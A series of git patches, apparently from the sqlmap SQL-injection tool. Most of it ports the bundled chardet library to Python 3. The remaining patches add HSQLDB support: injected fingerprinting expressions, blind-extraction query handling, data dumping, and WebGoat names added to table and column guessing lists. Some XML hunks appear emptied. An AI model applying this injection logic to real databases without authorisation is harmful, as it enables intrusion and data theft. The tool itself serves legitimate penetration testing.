range + self._mFreqChar = 0 def get_charset_name(self): if self._mNameProber: @@ -67,7 +74,7 @@ class SingleByteCharSetProber(CharSetProber): if not aLen: return self.get_state() for c in aBuf: - order = self._mModel['charToOrderMap'][ord(c)] + order = self._mModel['charToOrderMap'][wrap_ord(c)] if order < SYMBOL_CAT_ORDER: self._mTotalChar += 1 if order < SAMPLE_SIZE: @@ -75,9 +82,12 @@ class SingleByteCharSetProber(CharSetProber): if self._mLastOrder < SAMPLE_SIZE: self._mTotalSeqs += 1 if not self._mReversed: - self._mSeqCounters[self._mModel['precedenceMatrix'][(self._mLastOrder * SAMPLE_SIZE) + order]] += 1 - else: # reverse the order of the letters in the lookup - self._mSeqCounters[self._mModel['precedenceMatrix'][(order * SAMPLE_SIZE) + self._mLastOrder]] += 1 + i = (self._mLastOrder * SAMPLE_SIZE) + order + model = self._mModel['precedenceMatrix'][i] + else: # reverse the order of the letters in the lookup + i = (order * SAMPLE_SIZE) + self._mLastOrder + model = self._mModel['precedenceMatrix'][i] + self._mSeqCounters[model] += 1 self._mLastOrder = order if self.get_state() == constants.eDetecting: @@ -85,11 +95,16 @@ class SingleByteCharSetProber(CharSetProber): cf = self.get_confidence() if cf > POSITIVE_SHORTCUT_THRESHOLD: if constants._debug: - sys.stderr.write('%s confidence = %s, we have a winner\n' % (self._mModel['charsetName'], cf)) + sys.stderr.write('%s confidence = %s, we have a' + 'winner\n' % + (self._mModel['charsetName'], cf)) self._mState = constants.eFoundIt elif cf < NEGATIVE_SHORTCUT_THRESHOLD: if constants._debug: - sys.stderr.write('%s confidence = %s, below negative shortcut threshhold %s\n' % (self._mModel['charsetName'], cf, NEGATIVE_SHORTCUT_THRESHOLD)) + sys.stderr.write('%s confidence = %s, below negative' + 'shortcut threshhold %s\n' % + (self._mModel['charsetName'], cf, + NEGATIVE_SHORTCUT_THRESHOLD)) self._mState = constants.eNotMe return self.get_state() @@ -97,9 +112,8 @@ class SingleByteCharSetProber(CharSetProber): def 
get_confidence(self): r = 0.01 if self._mTotalSeqs > 0: -# print self._mSeqCounters[POSITIVE_CAT], self._mTotalSeqs, self._mModel['mTypicalPositiveRatio'] - r = (1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs / self._mModel['mTypicalPositiveRatio'] -# print r, self._mFreqChar, self._mTotalChar + r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs + / self._mModel['mTypicalPositiveRatio']) r = r * self._mFreqChar / self._mTotalChar if r >= 1.0: r = 0.99 diff --git a/thirdparty/chardet/sbcsgroupprober.py b/thirdparty/chardet/sbcsgroupprober.py index d19160c86..1b6196cd1 100644 --- a/thirdparty/chardet/sbcsgroupprober.py +++ b/thirdparty/chardet/sbcsgroupprober.py @@ -14,33 +14,35 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from charsetgroupprober import CharSetGroupProber -from sbcharsetprober import SingleByteCharSetProber -from langcyrillicmodel import Win1251CyrillicModel, Koi8rModel, Latin5CyrillicModel, MacCyrillicModel, Ibm866Model, Ibm855Model -from langgreekmodel import Latin7GreekModel, Win1253GreekModel -from langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel -from langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel -from langthaimodel import TIS620ThaiModel -from langhebrewmodel import Win1255HebrewModel -from hebrewprober import HebrewProber +from .charsetgroupprober import CharSetGroupProber +from .sbcharsetprober import SingleByteCharSetProber +from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel, + Latin5CyrillicModel, MacCyrillicModel, + Ibm866Model, Ibm855Model) +from .langgreekmodel import Latin7GreekModel, Win1253GreekModel +from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel +from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel +from .langthaimodel import TIS620ThaiModel +from .langhebrewmodel import Win1255HebrewModel +from .hebrewprober import HebrewProber + class SBCSGroupProber(CharSetGroupProber): def __init__(self): CharSetGroupProber.__init__(self) - self._mProbers = [ \ + self._mProbers = [ SingleByteCharSetProber(Win1251CyrillicModel), SingleByteCharSetProber(Koi8rModel), SingleByteCharSetProber(Latin5CyrillicModel), @@ -54,11 +56,14 @@ class SBCSGroupProber(CharSetGroupProber): SingleByteCharSetProber(Latin2HungarianModel), SingleByteCharSetProber(Win1250HungarianModel), SingleByteCharSetProber(TIS620ThaiModel), - ] + ] hebrewProber = HebrewProber() - 
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.False, hebrewProber) - visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.True, hebrewProber) + logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, + False, hebrewProber) + visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True, + hebrewProber) hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber) - self._mProbers.extend([hebrewProber, logicalHebrewProber, visualHebrewProber]) + self._mProbers.extend([hebrewProber, logicalHebrewProber, + visualHebrewProber]) self.reset() diff --git a/thirdparty/chardet/sjisprober.py b/thirdparty/chardet/sjisprober.py index 8f69f60be..cd0e9e707 100644 --- a/thirdparty/chardet/sjisprober.py +++ b/thirdparty/chardet/sjisprober.py @@ -13,25 +13,26 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import SJISDistributionAnalysis -from jpcntx import SJISContextAnalysis -from mbcssm import SJISSMModel -import constants, sys -from constants import eStart, eError, eItsMe +import sys +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import SJISDistributionAnalysis +from .jpcntx import SJISContextAnalysis +from .mbcssm import SJISSMModel +from . import constants + class SJISProber(MultiByteCharSetProber): def __init__(self): @@ -46,35 +47,40 @@ class SJISProber(MultiByteCharSetProber): self._mContextAnalyzer.reset() def get_charset_name(self): - return "SHIFT_JIS" + return self._mContextAnalyzer.get_charset_name() def feed(self, aBuf): aLen = len(aBuf) - for i in xrange(0, aLen): + for i in range(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: + if codingState == constants.eError: if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') + sys.stderr.write(self.get_charset_name() + + ' prober hit error at byte ' + str(i) + + '\n') self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: charLen = self._mCodingSM.get_current_charlen() if i == 0: self._mLastChar[1] = aBuf[0] - self._mContextAnalyzer.feed(self._mLastChar[2 - charLen :], charLen) + self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:], + charLen) 
self._mDistributionAnalyzer.feed(self._mLastChar, charLen) else: - self._mContextAnalyzer.feed(aBuf[i + 1 - charLen : i + 3 - charLen], charLen) - self._mDistributionAnalyzer.feed(aBuf[i - 1 : i + 1], charLen) + self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3 + - charLen], charLen) + self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1], + charLen) self._mLastChar[0] = aBuf[aLen - 1] if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): + if (self._mContextAnalyzer.got_enough_data() and + (self.get_confidence() > constants.SHORTCUT_THRESHOLD)): self._mState = constants.eFoundIt return self.get_state() diff --git a/thirdparty/chardet/test.py b/thirdparty/chardet/test.py deleted file mode 100644 index 2ebf3a4dc..000000000 --- a/thirdparty/chardet/test.py +++ /dev/null @@ -1,20 +0,0 @@ -import sys, glob -sys.path.insert(0, '..') -from chardet.universaldetector import UniversalDetector - -count = 0 -u = UniversalDetector() -for f in glob.glob(sys.argv[1]): - print f.ljust(60), - u.reset() - for line in file(f, 'rb'): - u.feed(line) - if u.done: break - u.close() - result = u.result - if result['encoding']: - print result['encoding'], 'with confidence', result['confidence'] - else: - print '******** no result' - count += 1 -print count, 'tests' diff --git a/thirdparty/chardet/universaldetector.py b/thirdparty/chardet/universaldetector.py index a08425f87..476522b99 100644 --- a/thirdparty/chardet/universaldetector.py +++ b/thirdparty/chardet/universaldetector.py @@ -14,23 +14,25 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from latin1prober import Latin1Prober # windows-1252 -from mbcsgroupprober import MBCSGroupProber # multi-byte character sets -from sbcsgroupprober import SBCSGroupProber # single-byte character sets -from escprober import EscCharSetProber # ISO-2122, etc. +from . import constants +import sys +import codecs +from .latin1prober import Latin1Prober # windows-1252 +from .mbcsgroupprober import MBCSGroupProber # multi-byte character sets +from .sbcsgroupprober import SBCSGroupProber # single-byte character sets +from .escprober import EscCharSetProber # ISO-2122, etc. import re MINIMUM_THRESHOLD = 0.20 @@ -38,68 +40,78 @@ ePureAscii = 0 eEscAscii = 1 eHighbyte = 2 + class UniversalDetector: def __init__(self): - self._highBitDetector = re.compile(r'[\x80-\xFF]') - self._escDetector = re.compile(r'(\033|~{)') + self._highBitDetector = re.compile(b'[\x80-\xFF]') + self._escDetector = re.compile(b'(\033|~{)') self._mEscCharSetProber = None self._mCharSetProbers = [] self.reset() def reset(self): self.result = {'encoding': None, 'confidence': 0.0} - self.done = constants.False - self._mStart = constants.True - self._mGotData = constants.False + self.done = False + self._mStart = True + self._mGotData = False self._mInputState = ePureAscii - self._mLastChar = '' + self._mLastChar = b'' if self._mEscCharSetProber: self._mEscCharSetProber.reset() for prober in self._mCharSetProbers: prober.reset() def feed(self, aBuf): - if self.done: return + if self.done: + return aLen = len(aBuf) - if not aLen: return + if not aLen: + return if not self._mGotData: # If the data starts with BOM, we know it is UTF - if 
aBuf[:3] == '\xEF\xBB\xBF': + if aBuf[:3] == codecs.BOM_UTF8: # EF BB BF UTF-8 with BOM - self.result = {'encoding': "UTF-8", 'confidence': 1.0} - elif aBuf[:4] == '\xFF\xFE\x00\x00': + self.result = {'encoding': "UTF-8-SIG", 'confidence': 1.0} + elif aBuf[:4] == codecs.BOM_UTF32_LE: # FF FE 00 00 UTF-32, little-endian BOM self.result = {'encoding': "UTF-32LE", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFE\xFF': + elif aBuf[:4] == codecs.BOM_UTF32_BE: # 00 00 FE FF UTF-32, big-endian BOM self.result = {'encoding': "UTF-32BE", 'confidence': 1.0} - elif aBuf[:4] == '\xFE\xFF\x00\x00': + elif aBuf[:4] == b'\xFE\xFF\x00\x00': # FE FF 00 00 UCS-4, unusual octet order BOM (3412) - self.result = {'encoding': "X-ISO-10646-UCS-4-3412", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFF\xFE': + self.result = { + 'encoding': "X-ISO-10646-UCS-4-3412", + 'confidence': 1.0 + } + elif aBuf[:4] == b'\x00\x00\xFF\xFE': # 00 00 FF FE UCS-4, unusual octet order BOM (2143) - self.result = {'encoding': "X-ISO-10646-UCS-4-2143", 'confidence': 1.0} - elif aBuf[:2] == '\xFF\xFE': + self.result = { + 'encoding': "X-ISO-10646-UCS-4-2143", + 'confidence': 1.0 + } + elif aBuf[:2] == codecs.BOM_LE: # FF FE UTF-16, little endian BOM self.result = {'encoding': "UTF-16LE", 'confidence': 1.0} - elif aBuf[:2] == '\xFE\xFF': + elif aBuf[:2] == codecs.BOM_BE: # FE FF UTF-16, big endian BOM self.result = {'encoding': "UTF-16BE", 'confidence': 1.0} - self._mGotData = constants.True + self._mGotData = True if self.result['encoding'] and (self.result['confidence'] > 0.0): - self.done = constants.True + self.done = True return if self._mInputState == ePureAscii: if self._highBitDetector.search(aBuf): self._mInputState = eHighbyte - elif (self._mInputState == ePureAscii) and self._escDetector.search(self._mLastChar + aBuf): + elif ((self._mInputState == ePureAscii) and + self._escDetector.search(self._mLastChar + aBuf)): self._mInputState = eEscAscii - self._mLastChar = aBuf[-1] + self._mLastChar = 
aBuf[-1:] if self._mInputState == eEscAscii: if not self._mEscCharSetProber: @@ -107,24 +119,26 @@ class UniversalDetector: if self._mEscCharSetProber.feed(aBuf) == constants.eFoundIt: self.result = {'encoding': self._mEscCharSetProber.get_charset_name(), 'confidence': self._mEscCharSetProber.get_confidence()} - self.done = constants.True + self.done = True elif self._mInputState == eHighbyte: if not self._mCharSetProbers: - self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), Latin1Prober()] + self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), + Latin1Prober()] for prober in self._mCharSetProbers: if prober.feed(aBuf) == constants.eFoundIt: self.result = {'encoding': prober.get_charset_name(), 'confidence': prober.get_confidence()} - self.done = constants.True + self.done = True break def close(self): - if self.done: return + if self.done: + return if not self._mGotData: if constants._debug: sys.stderr.write('no data received!\n') return - self.done = constants.True + self.done = True if self._mInputState == ePureAscii: self.result = {'encoding': 'ascii', 'confidence': 1.0} @@ -135,7 +149,8 @@ class UniversalDetector: maxProberConfidence = 0.0 maxProber = None for prober in self._mCharSetProbers: - if not prober: continue + if not prober: + continue proberConfidence = prober.get_confidence() if proberConfidence > maxProberConfidence: maxProberConfidence = proberConfidence @@ -148,7 +163,8 @@ class UniversalDetector: if constants._debug: sys.stderr.write('no probers hit minimum threshhold\n') for prober in self._mCharSetProbers[0].mProbers: - if not prober: continue - sys.stderr.write('%s confidence = %s\n' % \ - (prober.get_charset_name(), \ + if not prober: + continue + sys.stderr.write('%s confidence = %s\n' % + (prober.get_charset_name(), prober.get_confidence())) diff --git a/thirdparty/chardet/utf8prober.py b/thirdparty/chardet/utf8prober.py index fec8548c8..1c0bb5d8f 100644 --- a/thirdparty/chardet/utf8prober.py +++ 
b/thirdparty/chardet/utf8prober.py @@ -13,26 +13,26 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from constants import eStart, eError, eItsMe -from charsetprober import CharSetProber -from codingstatemachine import CodingStateMachine -from mbcssm import UTF8SMModel +from . import constants +from .charsetprober import CharSetProber +from .codingstatemachine import CodingStateMachine +from .mbcssm import UTF8SMModel ONE_CHAR_PROB = 0.5 + class UTF8Prober(CharSetProber): def __init__(self): CharSetProber.__init__(self) @@ -50,13 +50,13 @@ class UTF8Prober(CharSetProber): def feed(self, aBuf): for c in aBuf: codingState = self._mCodingSM.next_state(c) - if codingState == eError: + if codingState == constants.eError: self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: if self._mCodingSM.get_current_charlen() >= 2: self._mNumOfMBChar += 1 @@ -69,7 +69,7 @@ class UTF8Prober(CharSetProber): def get_confidence(self): unlike = 0.99 if self._mNumOfMBChar < 6: - for i in xrange(0, self._mNumOfMBChar): + for i in range(0, self._mNumOfMBChar): unlike = unlike * ONE_CHAR_PROB return 1.0 - unlike else: From 
41db0e0eea3125c6db4b467390803006e0f5f6a0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 13:48:21 +0200 Subject: [PATCH 73/92] range to xrange (leftovers) --- lib/takeover/udf.py | 4 ++-- thirdparty/chardet/eucjpprober.py | 2 +- thirdparty/chardet/mbcharsetprober.py | 2 +- thirdparty/chardet/sjisprober.py | 2 +- thirdparty/chardet/utf8prober.py | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index aa10b3c63..d5f951383 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -258,7 +258,7 @@ class UDF: else: logger.warn("invalid value, only digits are allowed") - for x in range(0, udfCount): + for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) @@ -293,7 +293,7 @@ class UDF: else: logger.warn("invalid value, only digits >= 0 are allowed") - for y in range(0, parCount): + for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? 
(default: %s) " % ((y + 1), defaultType) diff --git a/thirdparty/chardet/eucjpprober.py b/thirdparty/chardet/eucjpprober.py index 8e64fdcc2..2d5b2701c 100644 --- a/thirdparty/chardet/eucjpprober.py +++ b/thirdparty/chardet/eucjpprober.py @@ -51,7 +51,7 @@ class EUCJPProber(MultiByteCharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in range(0, aLen): + for i in xrange(0, aLen): # PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte codingState = self._mCodingSM.next_state(aBuf[i]) if codingState == constants.eError: diff --git a/thirdparty/chardet/mbcharsetprober.py b/thirdparty/chardet/mbcharsetprober.py index bb42f2fb5..c98cc6228 100644 --- a/thirdparty/chardet/mbcharsetprober.py +++ b/thirdparty/chardet/mbcharsetprober.py @@ -52,7 +52,7 @@ class MultiByteCharSetProber(CharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in range(0, aLen): + for i in xrange(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) if codingState == constants.eError: if constants._debug: diff --git a/thirdparty/chardet/sjisprober.py b/thirdparty/chardet/sjisprober.py index cd0e9e707..4edb6df9b 100644 --- a/thirdparty/chardet/sjisprober.py +++ b/thirdparty/chardet/sjisprober.py @@ -51,7 +51,7 @@ class SJISProber(MultiByteCharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in range(0, aLen): + for i in xrange(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) if codingState == constants.eError: if constants._debug: diff --git a/thirdparty/chardet/utf8prober.py b/thirdparty/chardet/utf8prober.py index 1c0bb5d8f..42d32ec3a 100644 --- a/thirdparty/chardet/utf8prober.py +++ b/thirdparty/chardet/utf8prober.py @@ -69,7 +69,7 @@ class UTF8Prober(CharSetProber): def get_confidence(self): unlike = 0.99 if self._mNumOfMBChar < 6: - for i in range(0, self._mNumOfMBChar): + for i in xrange(0, self._mNumOfMBChar): unlike = unlike * ONE_CHAR_PROB return 1.0 - unlike else: From fa4e86703566746849920097ab2239bea1b0e887 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 9 Oct 2015 14:17:13 +0200 Subject: [PATCH 74/92] Bug fix for MySQL fingerprinting (excluding HSQLDB MySQL look-alike) --- plugins/dbms/mysql/fingerprint.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 700badb4f..a4e440df7 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -177,6 +177,14 @@ class Fingerprint(GenericFingerprint): return False + result = inject.checkBooleanExpression("ROUNDMAGIC(NULL) IS NULL") + + if result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL + logger.warn(warnMsg) + + return False + # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 From 9641e84dd95c414edcf0640e7fd0616bb90b2ad4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 9 Oct 2015 16:52:13 +0200 Subject: [PATCH 75/92] Bug fixes for HSQLDB --- lib/core/agent.py | 11 +++++++++-- lib/core/dump.py | 2 +- lib/core/settings.py | 2 ++ plugins/dbms/hsqldb/enumeration.py | 4 ++++ plugins/generic/databases.py | 2 +- plugins/generic/entries.py | 2 +- txt/common-columns.txt | 4 ++++ txt/common-tables.txt | 3 +++ xml/queries.xml | 14 +++++++------- 9 files changed, 32 insertions(+), 12 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index f44c369cb..c6827461d 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -480,7 +480,7 @@ class Agent(object): @rtype: C{str} """ - prefixRegex = r"(?:\s+(?:FIRST|SKIP)\s+\d+)*" + prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*" fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) @@ -508,7 +508,10 @@ class Agent(object): elif fieldsSelectRownum: 
fieldsToCastStr = fieldsSelectRownum.groups()[0] elif fieldsSelectDistinct: - fieldsToCastStr = fieldsSelectDistinct.groups()[0] + if Backend.getDbms() in (DBMS.HSQLDB,): + fieldsToCastStr = fieldsNoSelect + else: + fieldsToCastStr = fieldsSelectDistinct.groups()[0] elif fieldsSelectCase: fieldsToCastStr = fieldsSelectCase.groups()[0] elif fieldsSelectFrom: @@ -888,6 +891,10 @@ class Agent(object): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr + elif Backend.isDbms(DBMS.HSQLDB): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) + limitedQuery += " %s" % limitStr + elif Backend.isDbms(DBMS.FIREBIRD): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1) limitedQuery += " %s" % limitStr diff --git a/lib/core/dump.py b/lib/core/dump.py index 03caf233b..058f5d9e9 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -160,7 +160,7 @@ class Dump(object): def currentDb(self, data): if Backend.isDbms(DBMS.MAXDB): self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3256c0fa1..3b53705ba 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -222,6 +222,8 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) +HSQLDB_DEFAULT_SCHEMA = "PUBLIC" + # Names that can't be used to name files on Windows OS WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", 
"COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py index 9bf2b9b23..67744d4b5 100644 --- a/plugins/dbms/hsqldb/enumeration.py +++ b/plugins/dbms/hsqldb/enumeration.py @@ -12,6 +12,7 @@ from lib.core.data import logger from lib.core.data import queries from lib.core.common import Backend from lib.core.common import unArrayizeValue +from lib.core.settings import HSQLDB_DEFAULT_SCHEMA from lib.request import inject class Enumeration(GenericEnumeration): @@ -40,3 +41,6 @@ class Enumeration(GenericEnumeration): def getHostname(self): warnMsg = "on HSQLDB it is not possible to enumerate the hostname" logger.warn(warnMsg) + + def getCurrentDb(self): + return HSQLDB_DEFAULT_SCHEMA diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index b9eed29b9..ed3ac32eb 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -674,7 +674,7 @@ class Databases: continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 6dc5fe8c4..ec1dc8640 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -296,7 +296,7 @@ class Entries: if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % 
(agent.preprocessField(tbl, column), diff --git a/txt/common-columns.txt b/txt/common-columns.txt index 3464db5fc..6eab10cab 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -2596,3 +2596,7 @@ tmp_lahir universitas urut waktu + +# WebGoat +cookie +login_count diff --git a/txt/common-tables.txt b/txt/common-tables.txt index 9468c9382..e9a488a2d 100644 --- a/txt/common-tables.txt +++ b/txt/common-tables.txt @@ -3366,3 +3366,6 @@ tuser tusers userstbl usertbl + +# WebGoat +user_data diff --git a/xml/queries.xml b/xml/queries.xml index 75185bca0..c57a5b49f 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -652,7 +652,7 @@ - + @@ -675,30 +675,30 @@ - + - + - + - + - + - + From 51444276c0e9572ec5a19a11949dceb34426754a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 14:19:47 +0200 Subject: [PATCH 76/92] Better dealing with MySQL vs HSQLDB --- plugins/dbms/mysql/fingerprint.py | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index a4e440df7..dbeedfa29 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -169,7 +169,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "confirming %s" % DBMS.MYSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("USER() LIKE USER()") + result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL @@ -177,14 +177,6 @@ class Fingerprint(GenericFingerprint): return False - result = inject.checkBooleanExpression("ROUNDMAGIC(NULL) IS NULL") - - if result: - warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) - - return False - # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 From 17ee40259273715d6520e2bd91640dbd5fdd9c26 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: 
Sat, 10 Oct 2015 14:53:08 +0200 Subject: [PATCH 77/92] Adding error regexes for HSQLDB --- xml/errors.xml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/xml/errors.xml b/xml/errors.xml index ebb7ddd0a..d8ba7fc72 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -104,6 +104,8 @@ + + From 786b51e6e4f7282faf96e014efa44f25ec02ee1f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 15:18:47 +0200 Subject: [PATCH 78/92] Minor patch --- xml/errors.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xml/errors.xml b/xml/errors.xml index d8ba7fc72..1ea13fbdc 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -105,7 +105,7 @@ - + From ecef7692000f40fc8d4e5231ae663fe1c7136798 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 10 Oct 2015 15:23:09 +0200 Subject: [PATCH 79/92] More generic approach (non-: versions appear too) --- xml/errors.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xml/errors.xml b/xml/errors.xml index 1ea13fbdc..eb4670fd9 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -105,7 